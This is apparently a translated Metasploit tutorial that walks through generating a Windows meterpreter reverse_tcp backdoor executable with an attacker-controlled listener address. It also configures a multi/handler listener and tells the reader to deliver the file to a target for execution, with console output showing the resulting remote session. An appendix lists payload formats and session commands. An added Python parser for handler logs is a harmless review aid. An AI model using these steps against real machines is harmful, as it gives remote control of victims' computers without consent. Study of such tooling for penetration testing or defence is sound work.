1. Generating the backdoor
1.1 Select the payload
msf > use payload/windows/meterpreter/reverse_tcp
1.2 Use the show options command to see which options need to be configured:
msf payload(reverse_tcp) > show options
Module options (payload/windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST yes The listen address
LPORT 4444 yes The listen port
1.3 Configure the payload options (LHOST here is the IP address of the listening host, i.e. the attacker's machine)
msf payload(reverse_tcp) > set LHOST 172.16.0.102
LHOST => 172.16.0.102
msf payload(reverse_tcp) > show options
Module options (payload/windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 172.16.0.102 yes The listen address
LPORT 4444 yes The listen port
1.4 Generate the backdoor file (-t specifies the backdoor file type, exe in this example; -f specifies the output path and file name)
msf payload(reverse_tcp) > generate -t exe -f /Users/jiangzhehao/Downloads/4.exe
[*] Writing 73802 bytes to /Users/jiangzhehao/Downloads/4.exe...
2. Configuring the handler side
2.1 Use exploit/multi/handler as the handler
msf > use exploit/multi/handler
2.2 Select the payload matching the backdoor generated above
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
2.3 Set the listen address and port required by the options
msf exploit(handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf exploit(handler) > set LHOST 172.16.0.102
LHOST => 172.16.0.102
2.4 Once configured, run the exploit command to start listening
msf exploit(handler) > exploit
[*] Started reverse TCP handler on 172.16.0.102:4444
[*] Starting the payload handler...
3. Deliver the generated backdoor to the client and have it executed
4. Wait at the handler's command line for the client to connect; once it does, the following appears:
[*] Sending stage (957999 bytes) to 172.16.0.102
[*] Meterpreter session 1 opened (172.16.0.102:4444 -> 172.16.0.102:53175) at 2016-05-08 20:12:37 +0800
meterpreter > exit
[*] Shutting down Meterpreter...
[*] 192.168.231.128 - Meterpreter session 1 closed. Reason: User exit
msf exploit(handler) >
(Once the server side exits, the client exits immediately as well)
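As an added example (not part of the original tutorial), a Python parser for the handler output shown above, for use when reviewing or alerting on saved msfconsole session logs. The log is built inline from this page's transcript plus a constructed second session (10.0.0.5) that never closes; the function names are my own.

```python
import re
from datetime import datetime

# "session opened" line: the address before "->" is the listener (LHOST:LPORT), after it the client.
OPEN_RE = re.compile(
    r"Meterpreter session (?P<sid>\d+) opened "
    r"\((?P<lhost>[\d.]+):(?P<lport>\d+) -> (?P<rhost>[\d.]+):(?P<rport>\d+)\) "
    r"at (?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2} [+-]\d{4})"
)
CLOSE_RE = re.compile(r"Meterpreter session (?P<sid>\d+) closed\.\s+Reason: (?P<reason>.+?)\s*$")
STAGE_RE = re.compile(r"Sending stage \((?P<size>\d+) bytes\) to (?P<rhost>[\d.]+)")

# Constructed sample: the handler transcript from this page plus a second,
# made-up session (10.0.0.5) that never closes.
SAMPLE_LOG = """\
[*] Started reverse TCP handler on 172.16.0.102:4444
[*] Starting the payload handler...
[*] Sending stage (957999 bytes) to 172.16.0.102
[*] Meterpreter session 1 opened (172.16.0.102:4444 -> 172.16.0.102:53175) at 2016-05-08 20:12:37 +0800
[*] Shutting down Meterpreter...
[*] 192.168.231.128 - Meterpreter session 1 closed. Reason: User exit
[*] Sending stage (957999 bytes) to 10.0.0.5
[*] Meterpreter session 2 opened (172.16.0.102:4444 -> 10.0.0.5:50001) at 2016-05-08 20:15:02 +0800
"""


def parse_handler_log(text):
    """Map each session id to listener, client, open time, stage size and close reason."""
    sessions = {}
    stages = {}  # client ip -> size of the last stage sent to it
    for line in text.splitlines():
        if m := STAGE_RE.search(line):
            stages[m["rhost"]] = int(m["size"])
        elif m := OPEN_RE.search(line):
            sessions[int(m["sid"])] = {
                "listener": (m["lhost"], int(m["lport"])),
                "client": (m["rhost"], int(m["rport"])),
                "opened_at": datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S %z"),
                "stage_bytes": stages.pop(m["rhost"], None),
                "closed_reason": None,  # filled in if a close line follows
            }
        elif m := CLOSE_RE.search(line):
            sid = int(m["sid"])
            if sid in sessions:
                sessions[sid]["closed_reason"] = m["reason"]
    return sessions


def open_sessions(text):
    """Ids of sessions that were opened but never closed in the log."""
    return sorted(sid for sid, rec in parse_handler_log(text).items() if rec["closed_reason"] is None)
```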
Appendix:
1. The generated backdoor can be produced in many formats, specifically:
bash,c,csharp,dw,dword,hex,java,js_be,js_le,num,perl,pl,powershell,ps1,py,python,raw,rb,ruby,sh,vbapplication,vbscript,asp,aspx,aspx-exe,dll,elf,elf-so,exe,exe-only,exe-service,exe-small,hta-psh,loop-vbs,macho,msi,msi-nouac,osx-app,psh,psh-net,psh-reflection,psh-cmd,vba,vba-exe,vba-psh,vbs,war
2. For a returned connection, use background to move the current session to the background;
3. Backgrounded sessions can be listed with sessions -i, and sessions -i id brings a backgrounded session back to the foreground;
4. A backgrounded session can also be terminated with sessions -k id.